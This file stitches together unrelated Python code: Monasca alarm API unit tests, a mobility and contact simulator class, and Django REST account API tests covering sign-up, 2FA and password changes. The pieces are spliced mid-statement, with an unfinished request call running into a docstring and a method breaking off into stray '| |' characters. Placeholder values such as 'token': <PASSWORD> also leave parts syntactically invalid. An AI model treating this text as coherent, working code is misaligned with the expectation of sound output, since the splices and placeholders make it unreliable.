headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
class TestAlarms(AlarmTestBase):
def setUp(self):
super(TestAlarms, self).setUp()
self.alarms_repo_mock = self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.alarms_repository.AlarmsRepository'
)).mock
self.alarms_resource = alarms.Alarms()
self.app.add_route('/v2.0/alarms',
self.alarms_resource)
self.app.add_route('/v2.0/alarms/{alarm_id}',
self.alarms_resource)
def test_alarms_get_alarms(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarm(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarm.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}
response = self.simulate_request(path='/v2.0/alarms/1',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarms_state_parameter(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='state=OK')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarms_severity_parameter(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
site, i.e. number of visits per time unit
dur_mean : float
Mean duration of a visit
num_age_groups : int
Number of age groups
verbose : bool (optional, default: False)
Verbosity level
"""
synthetic = (num_people is not None and num_sites is not None and mob_rate_per_type is not None and
dur_mean is not None and num_age_groups is not None)
real = (home_loc is not None and people_age is not None and site_loc is not None and site_type is not None and
mob_rate_per_age_per_type is not None and dur_mean_per_type is not None and home_tile is not None and
tile_site_dist is not None and variety_per_type is not None)
assert (synthetic != real), 'Unable to decide on real or synthetic mobility generation based on given arguments'
if synthetic:
self.mode = 'synthetic'
self.num_people = num_people
self.num_sites = num_sites
self.num_site_types = len(mob_rate_per_type)
self.num_age_groups = num_age_groups
# common duration for all types
self.dur_mean_per_type = np.array(self.num_site_types*[dur_mean])
# common mobility rate for all age groups
self.mob_rate_per_age_per_type = np.tile(mob_rate_per_type,(num_age_groups,1))
self.home_tile=None
self.tile_site_dist=None
self.variety_per_type=None
elif real:
self.mode = 'real'
self.num_people = len(home_loc)
self.home_loc = np.array(home_loc)
self.people_age = np.array(people_age)
self.num_sites = len(site_loc)
self.site_loc = np.array(site_loc)
self.site_type = np.array(site_type)
self.mob_rate_per_age_per_type = np.array(mob_rate_per_age_per_type)
self.num_age_groups = self.mob_rate_per_age_per_type.shape[0]
self.num_site_types = self.mob_rate_per_age_per_type.shape[1]
self.dur_mean_per_type = np.array(dur_mean_per_type)
self.variety_per_type=np.array(variety_per_type)
self.home_tile=np.array(home_tile)
self.tile_site_dist=np.array(tile_site_dist)
else:
raise ValueError('Provide more information for the generation of mobility data.')
self.delta = delta
self.verbose = verbose
@staticmethod
def from_json(fp, compute_contacts=True):
"""
        Read the object from `fp` (a .read()-supporting file-like object)
        whose contents are expected to be the JSON written by `to_json`.
Parameters
----------
fp : object
The input .read()-supporting file-like object
compute_contacts : bool (optional, default: True)
Indicate if contacts should be computed from the mobility traces.
            If True, then any `contacts` key in `fp` will be ignored.
            If False, `fp` must have a `contacts` key.
Return
------
sim : MobilitySimulator
The loaded object
"""
# Read file into json dict
data = json.loads(fp.read())
# Init object
init_attrs = ['num_people', 'num_sites', 'delta',
'mob_mean', 'dur_mean', 'verbose']
obj = MobilitySimulator(**{attr: data[attr] for attr in init_attrs})
# Set np.ndarray attributes
for attr in ['home_loc', 'site_loc']:
setattr(obj, attr, np.array(data[attr]))
# Set list attributes
for attr in ['visit_counts']:
setattr(obj, attr, list(data[attr]))
# Set `mob_traces` attribute into dict:defaultdict:InterLap
setattr(obj, 'mob_traces', {i: defaultdict(InterLap) for i in range(obj.num_people)})
for indiv, traces_i in data['mob_traces'].items():
indiv = int(indiv) # JSON does not support int keys
for site, visit_list in traces_i.items():
site = int(site) # JSON does not support int keys
if len(visit_list) > 0:
inter = InterLap()
inter.update(list(map(lambda t: Visit(*t), visit_list)))
obj.mob_traces[indiv][site] = inter
# Set `contacts` attribute into dict:defaultdict:InterLap
if compute_contacts: # Compute from `mob_traces`
all_mob_traces = []
for i, traces_i in obj.mob_traces.items():
for j, inter in traces_i.items():
all_mob_traces.extend(inter._iset)
# Compute contacts from mobility traces
obj.contacts = obj._find_contacts(all_mob_traces)
else: # Load from file
setattr(obj, 'contacts', {i: defaultdict(InterLap) for i in range(obj.num_people)})
for indiv_i, contacts_i in data['contacts'].items():
indiv_i = int(indiv_i) # JSON does not support int keys
for indiv_j, contact_list in contacts_i.items():
indiv_j = int(indiv_j) # JSON does not support int keys
if len(contact_list) > 0:
inter = InterLap()
inter.update(list(map(lambda t: Contact(*t), contact_list)))
obj.contacts[indiv_i][indiv_j] = inter
return obj
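    # Typical use of `from_json` (file name is illustrative): rebuild a
    # simulator from a previously exported trace and recompute contacts, e.g.
    #     with open('mob_traces.json', 'r') as fp:
    #         sim = MobilitySimulator.from_json(fp, compute_contacts=True)
    # With compute_contacts=False the JSON must already carry the 'contacts'
    # key in the same nested format produced by `to_json`.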
@staticmethod
def from_pickle(path):
"""
Load object from pickle file located at `path`
Parameters
----------
path : str
Path to input file
Return
------
sim : MobilitySimulator
The loaded object
"""
with open(path, 'rb') as fp:
obj = pickle.load(fp)
return obj
def to_pickle(self, path):
"""
Save object to pickle file located at `path`
Parameters
----------
path : str
Path to output file
"""
with open(path, 'wb') as fp:
pickle.dump(self, fp)
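    # Round-trip example (path is illustrative): pickling a simulated object
    # avoids re-running the expensive trace generation, e.g.
    #     sim.to_pickle('mob_sim.pk')
    #     sim = MobilitySimulator.from_pickle('mob_sim.pk')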
def _simulate_mobility(self, max_time, seed=None):
"""
Simulate mobility of all people for `max_time` time units
Parameters
----------
max_time : float
            Maximum time to simulate
seed : int
Random seed for reproducibility
Return
------
mob_traces : list of `Visit` namedtuples
List of simulated visits of individuals to sites
home_loc : numpy.ndarray
Locations of homes of individuals
site_loc : numpy.ndarray
Locations of sites
"""
# Set random seed for reproducibility
seed = seed or rd.randint(0, 2**32 - 1)
rd.seed(seed)
np.random.seed(seed-1)
if self.mode == 'synthetic':
# Random geographical assignment of people's home on 2D grid
self.home_loc = np.random.uniform(0.0, 1.0, size=(self.num_people, 2))
# Age-group of individuals
self.people_age = np.random.randint(low=0, high=self.num_age_groups,
size=self.num_people, dtype=int)
# Random geographical assignment of sites on 2D grid
self.site_loc = np.random.uniform(0.0, 1.0, size=(self.num_sites, 2))
# Random type for each site
site_type_prob = np.ones(self.num_site_types)/self.num_site_types
self.site_type = np.random.multinomial(
n=1, pvals=site_type_prob, size=self.num_sites).argmax(axis=1)
all_mob_traces, self.visit_counts = _simulate_synthetic_mobility_traces(
num_people=self.num_people,
num_sites=self.num_sites,
max_time=max_time,
home_loc=self.home_loc,
site_loc=self.site_loc,
site_type=self.site_type,
people_age=self.people_age,
mob_rate_per_age_per_type=self.mob_rate_per_age_per_type,
dur_mean_per_type=self.dur_mean_per_type,
delta=self.delta,
seed=rd.randint(0, 2**32 - 1)
)
elif self.mode == 'real':
all_mob_traces, self.visit_counts = _simulate_real_mobility_traces(
num_people=self.num_people,
max_time=max_time,
site_type=self.site_type,
people_age=self.people_age,
mob_rate_per_age_per_type=self.mob_rate_per_age_per_type,
dur_mean_per_type=self.dur_mean_per_type,
delta=self.delta,
home_tile=self.home_tile,
variety_per_type=self.variety_per_type,
tile_site_dist=self.tile_site_dist,
seed=rd.randint(0, 2**32 - 1)
)
# Group mobility traces per indiv and site
self.mob_traces = self._group_mob_traces(all_mob_traces)
return all_mob_traces
def _find_contacts(self, mob_traces):
"""Find contacts in a given list `mob_traces` of `Visit`s"""
# Group mobility traces by site
mob_traces_at_site = defaultdict(list)
for v in mob_traces:
mob_traces_at_site[v.site].append(v)
# dict of dict of list of contacts:
# i.e. contacts[i][j][k] = "k-th contact from i to j"
contacts = {i: defaultdict(InterLap) for i in range(self.num_people)}
# For each site s
for s in range(self.num_sites):
if self.verbose:
print('Checking site '+str(s+1)+'/'+str(self.num_sites), end='\r')
if len(mob_traces_at_site[s]) == 0:
continue
# Init the interval overlap matcher
inter = InterLap()
inter.update(mob_traces_at_site[s])
# Match contacts
for v in mob_traces_at_site[s]:
v_time = (v.t_from, v.t_to)
for vo in list(inter.find(other=v_time)):
# Ignore contacts with same individual
if v.indiv == vo.indiv:
continue
# Compute contact time
c_t_from = max(v.t_from, vo.t_from)
c_t_to = min(v.t_to, vo.t_to_shifted)
if c_t_to > c_t_from:
# Set contact tuple
c = Contact(t_from=c_t_from,
t_to=c_t_to,
indiv_i=v.indiv,
indiv_j=vo.indiv,
id_tup=(v.id, vo.id),
site=s,
duration=c_t_to - c_t_from)
# Add it to interlap
contacts[v.indiv][vo.indiv].update([c])
return contacts
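    # Worked example of the overlap rule above: if visit v spans
    # (t_from=2.0, t_to=5.0) and the matched visit vo spans
    # (t_from=4.0, t_to_shifted=7.0), then c_t_from = max(2.0, 4.0) = 4.0 and
    # c_t_to = min(5.0, 7.0) = 5.0, so a Contact of duration 1.0 is recorded;
    # pairs whose intervals do not properly overlap produce no contact.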
def _group_mob_traces(self, mob_traces):
"""Group `mob_traces` by individual and site for faster queries.
Returns a dict of dict of Interlap of the form:
mob_traces_dict[i][s] = "Interlap of visits of indiv i at site s"
"""
mob_traces_dict = {i: defaultdict(InterLap) for i in range(self.num_people)}
for v in mob_traces:
mob_traces_dict[v.indiv][v.site].update([v])
return mob_traces_dict
def simulate(self, max_time, seed=None):
"""
Simulate contacts between individuals in time window [0, max_time].
Parameters
----------
max_time : float
Maximum time to simulate
seed : int
Random seed for mobility simulation
        Notes
        -----
        The computed contacts are not returned; they are stored in
        `self.contacts` as a dict of dicts of InterLap objects, where
        `self.contacts[i][j]` holds the `Contact` namedtuples describing
        contacts between individuals `i` and `j`.
"""
self.max_time = max_time
# Simulate mobility of each individuals to each sites
if self.verbose:
print(f'Simulate mobility for {max_time:.2f} time units... ',
end='', flush=True)
all_mob_traces = self._simulate_mobility(max_time, seed)
if self.verbose:
print(f'Simulated {len(all_mob_traces)} visits.', flush=True)
# Find the contacts in all sites in the histories
if self.verbose:
print(f'Find contacts... ', end='')
self.contacts = self._find_contacts(all_mob_traces)
# FIXME: contact_count calculation takes too long
# self.contact_count = sum(len(self.contacts[i][j]) for i in range(
# self.num_people) for j in range(self.num_people))
# if self.verbose:
# print(f'Found {self.contact_count} contacts', flush=True)
def list_intervals_in_window_individual_at_site(self, *, indiv, site, t0, t1):
"""Return a generator of Intervals of all visits of `indiv` is at site
`site` that overlap with [t0, t1]
FIXME: Make sure that this query is correct
"""
for visit in self.mob_traces[indiv][site].find((t0, t1)):
            # Match on (`t_from`, `t_to_shifted`); we need to filter out visits
# that ended before `t0`, i.e. visits such that `t_to` <= `t0`
# FIXME: This could be made easier by using the non-shifted
# intervals in `self.mob_traces`
if visit.t_to > t0:
yield Interval(visit.t_from, visit.t_to)
def is_in_contact(self, *, indiv_i, indiv_j, t, site=None):
"""Indicate if individuals `indiv_i` is within `delta` time to
make contact with `indiv_j` at time `t` in site `site`, and return contact if possible
"""
try:
# Find contact matching time and check site
contact = next(self.contacts[indiv_i][indiv_j].find((t, t)))
return (site is None) or (contact.site == site), contact
except StopIteration: # No such contact, call to `next` failed
return False, None
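    # Callers unpack the (bool, Contact) pair returned above, e.g.
    #     in_contact, contact = sim.is_in_contact(indiv_i=0, indiv_j=1, t=3.5)
    # and only inspect `contact` when the flag is True.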
def will_be_in_contact(self, *, indiv_i, indiv_j, t, site=None):
"""Indicate if individuals | |
# Repository: robpop/explore_engine
from django.urls import reverse
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase, APIClient
from django.contrib.auth.models import User
from account.models import Profile
class AccountTests(APITestCase):
def setUp(self):
self.superuser = User.objects.create_user(username='unsift', email='<EMAIL>', password='<PASSWORD>!')
self.account = User.objects.create_user(username='test', email='<EMAIL>', password='<PASSWORD>!')
self.verified_email_account = User.objects.create_user(username='verified', email='<EMAIL>', password='<PASSWORD>!')
self.superuser_token = Token.objects.get(user__username='unsift')
self.account_token = Token.objects.get(user__username='test')
self.verified_email_account_token = Token.objects.get(user__username='verified')
verified_profile = Profile.objects.get(account=self.verified_email_account)
verified_profile.emailVerified = True
verified_profile.save()
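    # setUp creates three users: 'unsift' (used as the admin-style account),
    # 'test' (plain account, email unverified) and 'verified' (same, but its
    # Profile is flagged emailVerified=True). A DRF auth token is fetched for
    # each, so individual tests only pick the token matching the case they
    # exercise.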
def test_api_root(self):
url = reverse('api:api-root')
data = {}
response = self.client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# username-check tests
def test_username_check(self):
url = reverse('api:username-check')
data = {
'username': 'available'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, 'Username is available')
def test_username_check_without_username(self):
url = reverse('api:username-check')
data = {}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field is required']})
def test_username_check_with_blank_username(self):
url = reverse('api:username-check')
data = {
'username': ''
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field must not be blank']})
    def test_username_check_with_invalid_username(self):
url = reverse('api:username-check')
data = {
'username': 'abcABC123.-_!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'Username is not valid')
# sign-up tests
def test_signup(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data, {
"username": "available",
"email": "<EMAIL>"
})
def test_signup_without_username(self):
url = reverse('api:sign-up')
data = {
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field is required.']})
def test_signup_with_invalid_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abcABC123.-_!',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['This value does not match the required pattern.']
})
def test_signup_with_short_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abc',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['Ensure this field has at least 4 characters.']
})
def test_signup_with_long_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abcdefghijklmnopqrstuvwxyzabcde',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['Ensure this field has no more than 30 characters.']
})
def test_signup_with_taken_username(self):
url = reverse('api:sign-up')
data = {
'username': 'test',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['This field must be unique.']
})
def test_signup_without_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['This field is required.']
})
def test_signup_with_invalid_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': 'invalid',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['Enter a valid email address.']
})
def test_signup_with_taken_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['This email is in use by an existing account']
})
def test_signup_without_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'password': ['<PASSWORD>.']
})
def test_signup_with_all_lowercase_common_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"This password is too short. It must contain at least 8 characters.",
"This password is too common.",
"The password must contain at least 1 uppercase letter, A-Z.",
"The password must contain at least 1 digit, 0-9.",
"The password must contain at least 1 symbol."
]
})
def test_signup_with_all_uppercase_common_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"This password is too short. It must contain at least 8 characters.",
"This password is too common.",
"The password must contain at least 1 lowercase letter, a-z.",
"The password must contain at least 1 digit, 0-9.",
"The password must contain at least 1 symbol."
]
})
def test_signup_with_similar_password_to_username(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"The password is too similar to the username."
]
})
def test_signup_with_similar_password_to_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"The password is too similar to the email address."
]
})
# is-2fa-enabled tests
# MANUAL TESTING REQUIRED
# test_is_2fa_enabled_with_2fa_enabled
def test_is_2fa_enabled_without_authentication(self):
url = reverse('api:is-2fa-enabled')
data = {}
response = self.client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
"detail": "Authentication credentials were not provided."
})
def test_is_2fa_enabled_with_2fa_disabled(self):
url = reverse('api:is-2fa-enabled')
data = {}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, False)
# disable-2fa tests
# MANUAL TESTING REQUIRED
# test_disable_2fa_with_2fa_enabled
# test_disable_2fa_with_2fa_enabled_and_without_password
# test_disable_2fa_with_2fa_enabled_and_without_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_length_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_non_integer_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_password
def test_disable_2fa_without_authentication(self):
url = reverse('api:disable-2fa')
data = {
'password': '<PASSWORD>!',
'token': <PASSWORD>
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
"detail": "Authentication credentials were not provided."
})
def test_disable_2fa_with_2fa_disabled(self):
url = reverse('api:disable-2fa')
data = {
'password': '<PASSWORD>!',
'token': <PASSWORD>
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'This account does not have two-factor authentication enabled')
# obtain-api-token tests
# MANUAL TESTING REQUIRED
# test_obtain_api_token_with_2fa_enabled
# test_obtain_api_token_with_2fa_enabled_and_without_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_incorrect_length_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_non_integer_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_incorrect_2fa_token
def test_obtain_api_token(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'token': self.account_token.key
})
def test_obtain_api_token_with_email_for_username_field(self):
url = reverse('api:obtain-api-token')
data = {
'username': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'token': self.account_token.key
})
def test_obtain_api_token_without_username(self):
url = reverse('api:obtain-api-token')
data = {
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username, password": [
"Both of these fields are required"
]
})
def test_obtain_api_token_without_password(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username, password": [
"Both of these fields are required"
]
})
def test_obtain_api_token_with_invalid_username(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'unknown',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username": [
"The provided username or email is invalid"
]
})
def test_obtain_api_token_with_incorrect_password(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'The provided credentials are invalid')
# change-password tests
def test_change_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>!',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, 'Success')
def test_change_password_without_authentication(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>!',
'new_password': '<PASSWORD>!'
}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
'detail': 'Authentication credentials were not provided.'
})
def test_change_password_without_old_password(self):
url = reverse('api:change-password')
data = {
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'This field is required.'
]
})
def test_change_password_with_incorrect_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'This password is incorrect'
]
})
def test_change_password_with_short_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'Ensure this field has at least 8 characters.'
]
})
def test_change_password_with_long_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
